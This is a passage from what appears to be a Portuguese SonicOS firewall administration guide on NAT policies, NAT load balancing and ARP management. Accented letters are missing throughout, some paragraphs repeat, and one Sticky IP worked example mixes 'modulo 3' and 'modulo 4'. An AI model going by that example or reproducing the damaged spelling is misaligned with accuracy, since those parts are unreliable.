persistncia da conexo, como aplicativos da Web, formulrios da Web ou aplicativos de
carrinho de compras. Este o mecanismo padro e recomendvel para a maioria das
implantaes.
Round Robin o IP de origem percorre cada recurso de balanceamento de carga ativo
para cada conexo. Esse mtodo mais adequado para distribuio de carga igual quando
no necessria persistncia.
Bloquear remapeamento/Remapeamento simtrico esses dois mtodos so teis
quando voc conhece os endereos IP/redes de origem (por exemplo, quando voc deseja
controlar com preciso como o trfego de uma sub-rede convertido para outro).
Distribuio aleatria o IP de origem se conecta ao IP de destino aleatoriamente. Esse
mtodo til quando voc deseja espalhar aleatoriamente trfego em recursos internos.
Alta disponibilidade
Habilitar investigao se a opo estiver marcada, o firewall usar um dos dois
mtodos para investigar os endereos no grupo de balanceamento de carga, usando uma
simples consulta de ping ICMP para determinar se o recurso est ativo ou uma consulta
aberta de soquete TCP para determinar se o recurso est ativo. De acordo com os

intervalos configurveis, o firewall pode afastar o trfego de um recurso que no esteja
respondendo e enviar de novo o trfego para esse recurso assim que este comece
respondendo novamente.
Que mtodo de LB de NAT deverei usar?
Mtodo de LB
Requisito Exemplo de implantao de NAT
Distribuir carga no servidor Servidores externos/internos (por Round Robin
igualmente sem necessidade de exemplo, FTP ou Web)
persistncia
Balanceamento de carga Servidores externos/internos (por Distribuio
indiscriminado sem necessidade de exemplo, FTP ou Web) aleatria
persistncia
Requer persistncia da conexo do Site de comrcio eletrnico, segurana de Sticky IP
cliente e-mail, dispositivo SRA da SonicWALL
(Quaisquer servidores publicamente
acessveis que requerem persistncia)
Controle preciso de remapeamento Servidores de LAN para DMZ Bloquear
de rede de origem para um intervalo Segurana de e-mail, dispositivo SRA da remapeamento
de destino SonicWALL
Controle preciso de remapeamento Servidores internos (por exemplo, Remapeamento
de rede de origem e rede de destino Intranets ou Extranets) simtrico
Avisos
Somente dois mecanismos de verificao de integridade no momento (ping de ICMP e
abertura de soquete de TCP).
Nenhum mecanismo de persistncia de camada superior no momento (somente Sticky IP).
Nenhum mecanismo de "sorry-server" no momento se todos os servidores no grupo no
estiverem respondendo.
Nenhum mecanismo de "round robin com persistncia" no momento.
Nenhum mecanismo de "round robin ponderado" no momento.
Nenhum mtodo para detectar se o recurso est sobrecarregado no momento.
Enquanto no h limite para o nmero de recursos internos para os quais o dispositivo de
segurana de rede Dell SonicWALL consegue equilibrar a carga e no h limite para o
nmero de hosts que consegue monitorar, grupos excepcionalmente grandes de
balanceamento de carga (mais de 25) podem afetar o desempenho.
Detalhes de algoritmos de balanceamento de carga

Este apndice descreve como o firewall aplica algoritmos de balanceamento de carga:
Round Robin o IP de origem se conecta ao IP de destino como alternativa
Distribuio aleatria o IP de origem se conecta ao IP de destino aleatoriamente
Sticky IP o IP de origem se conecta ao mesmo IP de destino
Bloquear remapeamento a rede de origem dividida pelo tamanho do pool de destino
para criar segmentos lgicos

Remapeamento simtrico o IP de origem mapeia para o IP de destino (por exemplo,
10.1.1.10 -> 192.168.60.10).
Algoritmo de sticky IP
O IP de origem modulado com o tamanho do cluster do servidor para determinar o servidor
para o qual remapear. Os dois exemplos a seguir mostram como funciona o algoritmo de Sticky
IP.
Primeiro exemplo mapeamento para uma rede:
192.168.0.2 para 192.168.0.4
Destino convertido = 10.50.165.0/30 (Rede)
IP de origem do pacote = 192.168.0.2
192.168.0.2 = C0A80002 = 3232235522 = 11000000101010000000000000000010
(IP -> Hex -> Dec -> Binrio)
Frmula de Sticky IP = IP de orig. do pacote = 3232235522 [mdulo] Tamanho do destino convert. = 2
= 3232235522 [mdulo] 2
=0
(2 divide-se em numerador uniformemente. No h nenhum restante, logo, 0)
Frmula de Sticky IP gera deslocamento de 0.
Remapeamento de destino para 10.50.165.1.
Segundo exemplo Mapeamento para um intervalo de endereos IP:

192.168.0.2 para 192.168.0.4
Destino convertido = 10.50.165.1 - 10.50.165.3 (Intervalo)
IP de origem do pacote = 192.168.0.2
192.168.0.2 = C0A80002 = 3232235522 = 11000000101010000000000000000010
(IP -> Hex -> Dec -> Binrio)
Frmula de Sticky IP = IP de orig. do pacote = 3232235522 [mdulo] Tamanho do destino convert. = 3
= 3232235522 [mdulo] 4
= 1077411840.6666667 - 1077411840
= 0,6666667 * 3
=2
Frmula de Sticky IP gera deslocamento de 2.
Remapeamento de destino para 10.50.165.3.
Criar polticas de NAT

As polticas de NAT proporcionam flexibilidade de controle da converso de endereo de rede
com base em combinaes correspondentes de endereo IP de origem, endereo IP de
destino e servios de destino. A NAT baseada em poltica permite que voc implante diferentes
tipos de NAT simultaneamente. Esta seo contm as subsees seguintes:
Criar uma poltica de NAT de muitos para um na pgina 332
Criar uma poltica de NAT de muitos para muitos na pgina 333
Criar uma poltica de NAT um para um para trfego de sada na pgina 333
Criar uma poltica de NAT um para um para trfego de entrada (reflexiva) na pgina 334
Configurar o balanceamento de carga de NAT um para muitos na pgina 335
Converso de endereo de porta de entrada atravs de poltica de NAT um para um na
pgina 336

Converso de endereo de porta de entrada por meio do endereo IP de WAN na
pgina 337
Usar balanceamento de carga de NAT na pgina 340
Para esta seo, os exemplos usam os seguintes endereos IP para demonstrar a criao e a
ativao de polticas de NAT. Voc pode usar esses exemplos para criar polticas de NAT para
sua rede, substituindo seus endereos IP pelos exemplos mostrados aqui:
Sub-rede de IP 192.168.10.0/24 na interface X0
O endereo IP de X0 192.168.10.1
O endereo IP de X1 67.115.118.68
O endereo IP de "Vendas" de X2 192.168.30.1
Endereo "particular" do servidor Web em 192.168.30.200
Endereo "pblico" do servidor Web em 67.115.118.70
Endereos de intervalo de IP pblicos de 67.115.118.71 67.115.118.74
Criar uma poltica de NAT de muitos para um

Muitos para um a poltica de NAT mais comum em um dispositivo de segurana Dell
SonicWALL e permite que voc converta um grupo de endereos em um nico endereo. Na
maioria das vezes, isso significa que voc est em uma sub-rede de IP "particular" interna e
convertendo todas as solicitaes de sada para o endereo IP da interface de WAN do firewall
(por padro, a interface X1), de forma que o destino veja a solicitao como proveniente do
endereo IP da interface de WAN do firewall e no do endereo IP privado interno.
Essa poltica fcil de configurar e ativar. Na Interface de gerenciamento, v para a pgina
Rede > Polticas de NAT e clique no boto Adicionar. A janela Adicionar poltica de NAT
exibida para adicionar a poltica. Para criar uma poltica de NAT para permitir que todos os
sistemas na interface X2 iniciem o trfego por meio do endereo IP de WAN do firewall,
escolha o seguinte nas caixas suspensas:
Origem original: Sub-rede X2
Origem convertida: IP primrio de WAN
Destino original: Qualquer
Destino convertido: Original
Servio original: Qualquer
Servio convertido: Original
Interface de entrada: X2
Interface de sada: X1
Comentrio: Digite uma breve descrio
Habilitar poltica de NAT: Marcada
Criar uma poltica reflexiva: Desmarcada
Ao terminar, clique no boto OK para adicionar e ativar a Poltica de NAT. Esta poltica pode
ser duplicada para sub-redes por trs de outras interfaces do firewall basta substituir a
Origem original pela sub-rede por trs dessa interface, ajustar a interface de origem e
adicionar outra poltica de NAT.

Criar uma poltica de NAT de muitos para muitos
A poltica de NAT de muitos para muitos permite que voc converta um grupo de endereos
em um grupo de endereos diferentes. Isso permite que o firewall utilize vrios endereos para
executar a converso dinmica.
Essa poltica fcil de configurar e ativar. Voc precisa primeiro ir para Rede > Objetos de
endereos e clicar no boto Adicionar na parte inferior da tela. Quando a janela Adicionar
objeto de endereo for exibida, digite uma descrio para o intervalo no campo Nome,
escolha Intervalo no menu suspenso, insira o intervalo de endereos (geralmente os
endereos IP pblicos fornecidos pelo seu ISP) nos campos Endereo IP de incio e
Endereo IP de trmino e selecione WAN como a zona no menu Atribuio de zonas. Ao
terminar, clique no boto OK para criar o objeto de intervalo.
Selecione Rede > Polticas de NAT e clique no boto Adicionar. A janela Adicionar poltica
de NAT exibida. Para criar uma poltica de NAT para permitir que os sistemas na interface de
LAN (por padro, a interface X0) iniciem o trfego usando os endereos de intervalo pblico,
escolha o seguinte nos menus suspensos:
Origem original: Sub-rede primria de LAN
Origem convertida: public_range
Ao terminar, clique no boto OK para adicionar e ativar a Poltica de NAT. Com essa poltica
implementada, o firewall mapeia dinamicamente trfego de sada usando os quatro endereos
IP disponveis no intervalo que criamos.
Voc pode testar o mapeamento dinmico instalando vrios sistemas na interface de LAN (por
padro, a interface X0) em um intervalo disperso de endereos (por exemplo, 192.168.10.10,
192.168.10.100 e 192.168.10.200) e acessando o site pblico http://www.whatismyip.com de
cada sistema. Cada sistema deve exibir um endereo IP diferente do intervalo que criamos e
anex-lo poltica de NAT.
Criar uma poltica de NAT um para um para trfego de sada

A NAT um para um para trfego de sada outra poltica de NAT comum em um firewall para
traduzir um endereo IP interno em um endereo IP exclusivo. Isso til quando voc precisa
de sistemas especficos, como servidores, para usar um endereo IP especfico quando
iniciarem trfego para outros destinos. Na maioria das vezes usada uma poltica de NAT,
como esta poltica de NAT um para um, para mapear o endereo IP privado de um servidor
para um endereo IP pblico e ele associado a uma poltica reflexiva (espelho) que permite
que qualquer sistema da Internet pblica acesse o servidor, juntamente com uma regra de
acesso de firewall correspondente que permite isso. As polticas de NAT reflexivas so
abordadas na prxima seo.
Essa poltica fcil de configurar e ativar. Selecione Rede > Objetos de endereos e clique
no boto Adicionar na parte inferior da tela. Na janela Adicionar objeto de endereo, digite
uma descrio para o endereo IP particular do servidor no campo Nome. Escolha o Host no
menu Tipo, digite o endereo IP privado do servidor no campo Endereo IP e selecione a zona

atribuda pelo servidor no menu Atribuio de zona. Clique em OK. Em seguida, crie outro
objeto na janela Adicionar objeto de endereo para o endereo IP pblico do servidor com
os valores corretos e selecione WAN no menu Atribuio de zonas. Ao terminar, clique no
boto OK para criar o objeto de intervalo.
Em seguida, selecione Rede > Polticas de NAT e clique no boto Adicionar para exibir a
janela Adicionar poltica de NAT. Para criar uma poltica de NAT para permitir que o servidor
Web inicie o trfego para a Internet pblica usando seu endereo IP pblico mapeado, escolha
o seguinte nos menus suspensos:
Origem original: webserver_private_ip
Origem convertida: webserver_public_ip
Criar uma poltica reflexiva: Marcada
Ao terminar, clique no boto OK para adicionar e ativar a Poltica de NAT. Com essa poltica
implementada, o firewall converte o endereo IP privado do servidor para o endereo IP pblico
quando ele inicia o trfego fora da interface de WAN (por padro, a interface X1).
Voc pode testar o mapeamento um para um abrindo um navegador da Web no servidor e
acessando o site pblico http://www.whatismyip.com. O site deve exibir o endereo IP pblico
que anexamos ao endereo IP privado na poltica de NAT recm-criada.
Criar uma poltica de NAT um para um para trfego de entrada (reflexiva)

Esta a poltica de espelhamento para aquela criada na seo anterior quando voc marcou
Criar uma poltica reflexiva. Ela permite que voc converta um endereo IP pblico externo
em um endereo IP privado interno. Esta poltica de NAT, quando combinada com uma poltica
de acesso de "permisso", permite que qualquer origem se conecte ao servidor interno usando
o endereo IP pblico; o firewall manipula a converso entre os endereos privado e pblico.
Com essa poltica implementada, o firewall converte o endereo IP pblico do servidor para o
endereo IP privado quando a conexo solicita a chegada atravs da interface de WAN (por
padro, a interface X1).
Abaixo voc pode criar a entrada, bem como a regra para permitir o acesso HTTP ao servidor.
Voc precisa criar a poltica de acesso que permite que algum efetue conexes HTTP ao
servidor Web atravs do endereo IP pblico do servidor Web.
Nota Com verses anteriores do firmware, era necessrio escrever regras para o endereo IP
particular. Isso foi alterado a partir do SonicOS. Se voc escrever uma regra para o
endereo IP particular, a regra no funcionar.
V para a pgina Firewall > Regras de acesso e escolha a poltica para a interseo de zona
"WAN" para "Vendas" (ou qualquer zona onde colocou seu servidor). Clique no boto
"Adicionar..." para abrir a tela pop-up de poltica de acesso. Quando o pop-up for exibido, insira
os seguintes valores:
Ao: Permitir
Servio: HTTP

Origem: Qualquer
Destino: Webserver_public_ip
Usurios permitidos: Tudo
Programao: Sempre ativa
Registro em log: Marcada
Comentrio: (Digite uma descrio breve)
Quando terminar, tente acessar o endereo IP pblico do servidor Web usando um sistema
localizado na Internet pblica. Voc deve ser capaz de se conectar com xito. Caso contrrio,
examine esta seo e a seo anterior e certifique-se de que inseriu todas as configuraes
exigidas corretamente.
Configurar o balanceamento de carga de NAT um para muitos

As polticas de NAT um para muitos podem ser usadas para realizar o balanceamento de carga
do destino convertido usando o endereo IP de origem original como a chave para
persistncia. Por exemplo, os firewalls podem realizar o balanceamento de carga de vrios
dispositivos SRA, mantendo de igual forma persistncia da sesso sempre balanceando
clientes para o SRA de destino correto.
Para configurar o balanceamento de carga de NAT um para muitos, v primeiro para a pgina
Firewall > Regras de acesso e escolha a poltica de WAN para LAN. Clique no boto
Adicionar... para exibir a tela pop-up de poltica de acesso. Quando o pop-up for exibido, insira
os seguintes valores:
Ao: Permitir
Servio: HTTPS
Origem: Qualquer
Destino: IP primrio de WAN
Comentrio: Texto descritivo, como SSLVPN LB
Registro em log: Marcada
Permitir pacotes fragmentados: Desmarcada
Em seguida, crie a seguinte poltica de NAT selecionando Rede > Polticas de NAT e clicando
no boto Adicionar...:
Origem original: Qualquer
Origem convertida: Original
Destino original: IP primrio de WAN
Destino convertido: Selecione Criar novo objeto de endereo... para abrir a tela
Adicionar objeto de endereo.
Nome: Um nome descritivo, como mySSLVPN
Atribuio de zonas: LAN
Tipo: Host
Endereo IP: Os endereos IP dos dispositivos que devem ser submetidos a
balanceamento de carga (na topologia mostrada acima, isso 192.168.200.10,
192.168.200.20 e 192.168.200.30.)
Servio original: HTTPS
Servio convertido: HTTPS
Interface de entrada: Qualquer
Interface de sada: Qualquer

Comentrio: Texto descritivo, como SSLVPN LB
Converso de endereo de porta de entrada atravs de poltica de NAT um para um

Esse tipo de poltica de NAT til quando voc deseja ocultar a porta de escuta real de um
servidor interno, mas fornecer acesso pblico ao servidor em uma porta diferente. No exemplo
abaixo voc pode modificar a poltica de NAT e a regra criada na seo anterior para permitir
que usurios pblicos se conectem ao servidor Web privado em seu endereo IP pblico, mas
por meio de uma porta diferente (TCP 9000), em vez da porta HTTP padro (TCP 80).
Etapa 1 Crie um servio personalizado para a porta diferente. V para a pgina Firewall > Servios
personalizados e selecione o boto Adicionar. Quando a tela pop-up for exibida, atribua um
nome ao seu servio personalizado, como webserver_public_port, digite 9000 como a porta
inicial e a porta final e escolha TCP(6) como o protocolo. Ao terminar, clique no boto OK para
salvar o servio personalizado.
Etapa 2 Modifique a poltica de NAT criada na seo anterior que permitiu que qualquer usurio pblico
se conectasse ao servidor da Web em seu endereo IP pblico. V para o menu Rede >
Polticas de NAT e clique no boto Editar prximo desta poltica de NAT. A janela Editar
poltica de NAT exibida para editar a poltica. Edite a poltica de NAT para que ela inclua o
seguinte dos menus suspensos:
Destino original: webserver_public_ip
Destino convertido: webserver_private_ip
Servio original: webserver_public_port (ou tudo o que voc nomeou acima)
Servio convertido: HTTP
Nota Verifique se voc escolheu Qualquer como a interface de destino e no a interface na qual
se encontra o servidor. Isso pode parecer contraditrio, mas , na verdade, a ao correta
a fazer (se voc tentar especificar a interface, voc obter um erro).
Etapa 3 Quando terminar, clique no boto OK para adicionar e ativar a poltica de NAT. Com essa
poltica implementada, o firewall converte o endereo IP pblico do servidor para o endereo
IP particular quando a conexo solicita a chegada da interface de WAN (por padro, a interface
X1) e converte o protocolo solicitado (TCP 9000) para a porta de escuta real do servidor (TCP
80).
Finalmente, voc ir modificar a regra de acesso do firewall criada na seo anterior para
permitir que qualquer usurio pblico se conecte ao servidor Web na nova porta (TCP 9000)
em vez da porta de escuta real do servidor (TCP 80).

Navegue at a seo Firewall > Regras de acesso e escolha a poltica para a interseo de
zona WAN para Vendas (ou qualquer zona onde colocou seu servidor). Clique no boto
Configurar para exibir a poltica criada anteriormente. Quando o pop-up aparecer, edite os
valores a seguir:
Ao: Permitir
Servio: server_public_port (ou tudo o que voc nomeou acima)
Origem: Qualquer
Destino: webserver_public_ip
Log: marcado
Comentrio: (digite uma descrio breve)
Quando terminar, tente acessar o endereo IP pblico do servidor Web usando um sistema
localizado na Internet pblica na porta nova personalizada (exemplo: http://
67.115.118.70:9000). Voc deve ser capaz de se conectar com xito. Caso contrrio, examine
esta seo e a seo anterior e certifique-se de que inseriu todas as configuraes exigidas
corretamente.
Converso de endereo de porta de entrada por meio do endereo IP de WAN

Esta uma das polticas de NAT mais complexas que voc pode criar em um firewall
executando o SonicOS: ela permite que voc use o endereo IP de WAN do firewall para
fornecer acesso a vrios servidores internos. Isso muito til em situaes em que seu ISP
fornece somente um nico endereo IP pblico e esse endereo IP tem de ser usado pela
interface de WAN do firewall (por padro, a interface X1).
A seguir, voc cria a programao para fornecer acesso pblico a dois servidores Web internos
por meio do endereo IP de WAN do firewall; cada est ligada a uma porta personalizada
exclusiva. Nos exemplos a seguir, voc configura dois, mas possvel criar mais do que estes
desde que as portas sejam exclusivas.
Nesta seo, temos cinco tarefas para realizar:
1. Crie dois objetos de servio personalizados para as portas pblicas exclusivas de resposta
dos servidores.
2. Crie dois objetos de endereo para os endereos IP privados dos servidores.
3. Crie duas entradas NAT para permitir que os dois servidores iniciem o trfego para a
Internet pblica.
4. Crie duas entradas NAT para mapear as portas personalizadas para as portas de escuta
reais e mapear os endereos IP privados para o endereo IP de WAN do firewall.
5. Crie duas entradas de regra de acesso para permitir que qualquer usurio pblico se
conecte aos dois servidores atravs do endereo IP de WAN do firewall e respectivas
portas personalizadas exclusivas dos servidores.

Etapa 1 Crie um servio personalizado para a porta diferente. V para a pgina Firewall > Servios
personalizados e clique no boto Adicionar. Quando a tela pop-up for exibida, atribua nomes
aos servios personalizados, como servone_public_port e servtwo_public_port, digite 9100
e 9200 como as portas inicial e final e escolha TCP(6) como o protocolo. Ao terminar, clique
no boto OK para salvar os servios personalizados.
Etapa 2 V para Rede > Objetos de endereos e clique no boto Adicionar na parte inferior da
pgina. Na janela Adicionar objetos de endereos, digite uma descrio para os endereos
IP privados do servidor, escolha Host na caixa suspensa, digite os endereos IP privados do
servidor e selecione a zona na qual se encontram os servidores. Ao terminar, clique no boto
OK para criar o objeto de intervalo.
Etapa 3 V para o menu Rede > Polticas de NAT e clique no boto Adicionar. A janela Adicionar
poltica de NAT exibida. Para criar uma poltica de NAT para permitir que os dois servidores
iniciem o trfego para a Internet pblica usando o endereo IP de WAN do firewall, escolha o
seguinte das caixas suspensas:
Origem original: servone_private_ip
E:
Origem original: servtwo_private_ip

Quando terminar, clique no boto OK para adicionar e ativar as polticas de NAT. Com essas
polticas em vigor, o firewall converte endereos IP privados dos servidores para o endereo
IP pblico quando inicia o trfego fora da interface de WAN (por padro, a interface X1).
Etapa 4 V para o menu Rede > Polticas de NAT e clique no boto Adicionar. A janela Adicionar
poltica de NAT exibida. Para criar as polticas de NAT para mapear as portas
personalizadas s portas de escuta reais dos servidores e mapear o endereo IP de WAN do
firewall para os endereos particulares dos servidores, escolha o seguinte nas caixas
suspensas:
Destino convertido: servone_private_ip
Servio original: servone_public_port
E:
Destino convertido: servtwo_private_ip
Servio original: servtwo_public_port
Interface de origem: X1
Interface de destino: Qualquer
Nota Verifique se voc escolheu Qualquer como a interface de destino e no a interface

na qual se encontra o servidor. Isso pode parecer contraditrio, mas , na verdade,
a ao correta a fazer (se voc tentar especificar a interface, voc obter um erro).
Quando terminar, clique no boto OK para adicionar e ativar as polticas de NAT. Com essas
polticas implementadas, o firewall converte o endereo IP pblico do servidor para o endereo
IP privado quando a conexo solicita a chegada da interface de WAN (por padro, a interface
X1).
Etapa 5 Crie as regras de acesso que permitem que qualquer pessoa da Internet pblica acesse os
dois servidores Web usando as portas personalizadas e o endereo IP de WAN do firewall.

V para a pgina Firewall > Regras de acesso e escolha a poltica para a interseo de
zona "WAN" para "Vendas" (ou qualquer zona onde colocou seus servidores). Clique no
boto "Adicionar..." para abrir a janela pop-up para criar as polticas. Quando o pop-up for
exibido, insira os seguintes valores:
Ao: Permitir
Servio: servone_public_port (ou tudo o que voc nomeou acima)
Origem: Qualquer
Destino: Endereo IP de WAN
Log: marcado
E:
Ao: Permitir
Servio: servtwo_public_port (ou tudo o que voc nomeou acima)
Origem: Qualquer
Destino: Endereo IP de WAN
Log: marcado
Quando tiver terminado, tente acessar os servidores Web por meio do endereo IP de WAN
do firewall usando um sistema localizado na Internet pblica na porta nova personalizada
(exemplo: http://67.115.118.70:9100 e http://67.115.118.70:9200). Voc deve ser capaz de
se conectar com xito. Caso contrrio, examine esta seo e a seo anterior e certifique-
se de que inseriu todas as configuraes exigidas corretamente.
Usar balanceamento de carga de NAT

Esta seo contm as subsees seguintes:
Pr-requisitos na pgina 340
Configurar o balanceamento de carga de NAT na pgina 341
Solucionar problemas do balanceamento de carga de NAT na pgina 342
Pr-requisitos
Os exemplos mostrados na seo Lista de tarefas nas prximas pginas utilizam informaes
de endereamento IP de uma configurao de demonstrao. Verifique e substitua quaisquer
informaes de endereamento IP mostradas nos exemplos pelas informaes de
endereamento corretas para sua configurao. Observe tambm que os nomes da interface
podem ser diferentes.
Nota altamente recomendvel que voc habilite o registro em log para todas as categorias e
habilite a resoluo de nome para registro em log.

Para habilitar o registro em log e alerta, faa logon na GUI de gerenciamento do firewall, v
para Log > Categorias, escolha Depurar na lista suspensa junto de Nvel de log, escolha
Todas as categorias na lista suspensa junto de Ver estilo, marque as caixas na barra de ttulo
junto de Log e Alertas para capturar todas as categorias e clique no boto Aplicar no canto
superior direito para salvar e ativar as alteraes. Como exemplo, veja a captura de tela
abaixo. A depurao de logs s deve ser usada para configurao inicial e resoluo de
problemas e recomenda-se que, quando a instalao estiver concluda, voc defina o nvel de
log para um nvel mais apropriado para seu ambiente de rede.
Para habilitar a resoluo de nome de log, v para Log > Resoluo de nome, escolha DNS,
em seguida, NetBIOS na lista suspensa Menu de resoluo de nome e clique no boto
Aplicar no canto superior direito para salvar e ativar as alteraes.
Configurar o balanceamento de carga de NAT

Para configurar o balanceamento de carga de NAT, voc deve concluir as seguintes tarefas:
1. Crie objetos de endereos.
2. Crie um grupo de endereos.
3. Crie uma poltica de LB de NAT de entrada.
4. Crie uma poltica de LB de NAT de sada.
5. Crie uma regra de firewall.
6. Verifique e solucione problemas na rede, se necessrio.
Para completar esta configurao, realize as seguintes etapas:
Etapa 1 Criar objetos de rede v para a pgina Rede > Objetos de endereos na GUI de
gerenciamento e crie os objetos de rede para os dois servidores Web internos e o IP virtual
(VIP) em que os usurios externos acessaro os servidores.
Etapa 2 Criar grupo de endereos crie agora um grupo de endereos denominado www_group e
adicione os dois objetos de endereos do servidor interno que voc acabou de criar.
Etapa 3 Criar regra de NAT de entrada para o grupo crie agora uma regra de NAT para permitir que
qualquer pessoa que tentar acessar o VIP obtenha converso para o grupo de endereos que
voc acabou de criar, usando Sticky IP como o mtodo de NAT.
Nota No salve ainda a regra de NAT.
Etapa 4 Definir tipo de LB e mtodo de atividade do servidor na guia Avanado do controle de

configurao da poltica de NAT, voc pode especificar o objeto (ou grupo de objetos ou
grupos) que deve ser monitorado por meio de ping ICMP ou atravs da verificao de soquetes
TCP abertos. Para esse exemplo, iremos verificar se o servidor est ativo e respondendo,
monitorando a porta TCP 80 (o que bom, pois o que as pessoas esto tentando acessar).
Agora voc pode clicar no boto OK para salvar e ativar as alteraes.

Nota Antes de prosseguir, verifique os logs e a pgina de status para ver se os recursos foram
detectados e registrados como on-line. Dois alertas aparecero como eventos de firewall
com a mensagem "Monitoramento de rede: Host 192.160.200.220 est on-line"(com seus
endereos IP). Se voc no vir essas duas mensagens abaixo, verifique as etapas acima.
Etapa 5 Criar regra de NAT de sada para grupo de LB grave uma regra de NAT para permitir que
os servidores internos obtenham converso para o VIP ao acessar recursos fora da interface
de WAN (por padro, a interface X1).
Etapa 6 Criar regra de firewall para VIP grave uma regra de firewall para permitir que o trfego do
exterior acesse os servidores Web internos via VIP.
Etapa 7 Testar seu trabalho a partir de um laptop fora da WAN, conecte-se atravs de HTTP ao VIP
usando um navegador da Web.
Nota Se voc desejar realizar o balanceamento de carga em um ou mais dispositivos SRA da

SonicWALL, repita as etapas 1 a 7 usando HTTPS como o servio permitido.
Solucionar problemas do balanceamento de carga de NAT

Se os servidores Web no parecerem estar acessveis, v para a pgina Firewall > Regras de
acesso e passe o mouse sobre o cone Estatsticas.
Se a regra tiver sido configurada incorretamente, voc no ver quaisquer bytes Rx ou TX; se
estiver funcionando, voc ver estes incrementos com cada acesso externo bem-sucedido dos
recursos de balanceamento de carga.
Voc tambm pode verificar a pgina Firewall > Polticas de NAT e passar o mouse sobre o
cone Estatsticas. Se a poltica tiver sido configurada incorretamente, voc no ver
quaisquer bytes Rx ou TX; se estiver funcionando, voc ver estes incrementos com cada
acesso externo bem-sucedido dos recursos de balanceamento de carga.
Finalmente, verifique os logs e a pgina de status para ver se h alertas (destacados em
amarelo) sobre o Monitoramento de rede observando hosts que estejam off-line; todos os seus
recursos de balanceamento de carga podero no estar alcanveis atravs do firewall e o
mecanismo de investigao poder t-los marcado como off-line e fora de servio. Verifique os
recursos de balanceamento de carga para garantir que eles esto funcionais e verifique as
conexes de rede entre eles e o firewall.

Captulo 21
Gerenciar trfego de ARP
Rede > ARP

O ARP (Protocolo de resoluo de endereo) mapeia a camada 3 (endereos IP) para a
camada 2 (endereos fsicos ou MAC) para permitir comunicaes entre hosts que residem na
mesma sub-rede. O ARP um protocolo de transmisso que pode criar quantidades
excessivas de trfego de rede em sua rede. Para minimizar o trfego de difuso, um cache de
ARP mantido para armazenar e reutilizar informaes de ARP anteriormente aprendidas.
Gerenciar trfego de ARP | 343

Entradas ARP estticas
O recurso ARP esttico permite que mapeamentos estticos sejam criados entre endereos
MAC de camada 2 e endereos IP de camada 3, mas tambm fornece os seguintes recursos:
Publicar entrada a habilitao da opo Publicar entrada na janela Adicionar ARP

esttico faz com que o dispositivo de firewall responda a consultas ARP para o endereo
IP especificado com o endereo MAC especificado. Isso pode ser usado, por exemplo,
para que o dispositivo de firewall responda a um endereo IP secundrio em uma
determinada interface, adicionando o endereo MAC do firewall. Consulte a seo de sub-
rede secundria que se segue.
Vincular endereo MAC a habilitao da opo Vincular endereo MAC na janela
Adicionar ARP esttico vincula o endereo MAC especificado interface e ao endereo
IP designados. Isso pode ser usado para garantir que uma estao de trabalho especfica
(como reconhecida pelo endereo MAC exclusivo da placa de rede) possa somente ser
usada em uma interface especificada no firewall. Depois que o endereo MAC seja
vinculado a uma interface, o firewall no responder a esse endereo MAC em qualquer
outra interface. Ele tambm remover todas as referncias armazenadas em cache
dinamicamente a esse endereo MAC que possa ter estado presente e proibir
mapeamentos estticos (no exclusivos) adicionais do endereo MAC.
Atualizar endereo IP dinamicamente a configurao Atualizar endereo IP
dinamicamente na janela Adicionar ARP esttico um recurso secundrio da opo
Vincular endereo MAC. Isso permite que um endereo MAC seja vinculado a uma
interface quando o DHCP estiver a ser usado para alocar dinamicamente o endereamento
IP. A habilitao desta opo desfocar o campo Endereo IP e preencher o Cache de
ARP com o endereo IP alocado pelo servidor DHCP interno do firewall ou pelo servidor
DHCP externo se o Auxiliar de IP estiver sendo usado.
Sub-redes secundrias com ARP esttico

O recurso ARP esttico permite que sub-redes secundrias sejam adicionadas em outras
interfaces e sem a adio de regras NAT automticas.

Adicionar uma sub-rede secundria usando o mtodo de ARP esttico
Etapa 1 Adicione uma entrada de ARP esttico "publicada" para o endereo de gateway que ser
usado para a sub-rede secundria, atribuindo-a ao endereo MAC da interface do firewall
qual ser conectada.
Etapa 2 Adicione uma rota esttica para essa sub-rede, para que o firewall a considere como trfego
vlido e saiba para qual interface rotear o trfego dessa sub-rede.
Etapa 3 Adicione Regras de acesso para permitir que o trfego destinado a essa sub-rede passe na
interface de rede correta.
Etapa 4 Opcional: Adicione uma rota esttica nos dispositivos upstream para que eles saibam qual IP
do gateway usar para acessar a sub-rede secundria.
Considere o seguinte exemplo de rede:
Para suportar a configurao acima, crie primeiro uma entrada de ARP esttico publicada
para 192.168.50.1, o endereo que servir como o gateway para a sub-rede secundria e
associe interface de LAN apropriada. Na pgina Rede > ARP, selecione o boto
Adicionar na seo Entradas ARP estticas e adicione a seguinte entrada:
A entrada aparecer na tabela.
Navegue at a pgina Rede > Roteamento e adicione uma rota esttica para a rede
192.168.50.0/24, com a mscara de sub-rede 255.255.255.0 na interface X3.
Para permitir que o trfego alcance a sub-rede 192.168.50.0/24 e permitir que a sub-rede
192.168.50.0/24 alcance os hosts na LAN, navegue at a pgina Firewall > Regras de acesso
e adicione regras de acesso apropriadas para permitir a passagem do trfego.
Gerenciar trfego de ARP | 345

Navegar e classificar a tabela de cache de ARP
A tabela Cache de ARP fornece fcil paginao para a visualizao de um grande nmero de
entradas ARP. Voc pode navegar em um grande nmero de entradas ARP listadas na tabela
Cache de ARP usando a barra de controle de navegao localizada na parte superior direita
da tabela Cache de ARP.
A barra de controle de navegao inclui quatro botes. O boto mais esquerda exibe a
primeira pgina da tabela. O boto mais direita exibe a ltima pgina. Os botes de seta
interiores para a esquerda e para a direita movem a pgina anterior ou seguinte,
respectivamente.
# Nome) no campo Itens para avanar para uma entrada ARP especfica. A configurao de
tabela padro exibe 50 entradas por pgina. Voc pode alterar esse nmero padro de
entradas de tabelas na pgina Sistema > Administrao.
Navegar e classificar entradas da tabela de cache de ARP

A tabela Cache de ARP fornece fcil paginao para a visualizao de um grande nmero de
entradas ARP. Voc pode navegar em um grande nmero de entradas ARP listadas na tabela
Cache de ARP usando a barra de controle de navegao localizada na parte superior direita
da tabela Cache de ARP. A barra de controle de navegao inclui quatro botes. O boto mais
esquerda exibe a primeira pgina da tabela. O boto mais direita exibe a ltima pgina. Os
botes de seta interiores para a esquerda e para a direita movem a pgina anterior ou seguinte,
respectivamente.
# Nome) no campo Itens para avanar para uma entrada ARP especfica. A configurao de
Liberar o cache de ARP

Por vezes necessrio liberar o cache de ARP se o endereo IP tiver sido alterado para um
dispositivo na rede. Como o endereo IP est vinculado a um endereo fsico, o endereo IP
pode alterar, mas ainda estar associado ao endereo fsico no cache de ARP. A liberao do
cache de ARP permite que novas informaes sejam coletadas e armazenadas no cache de
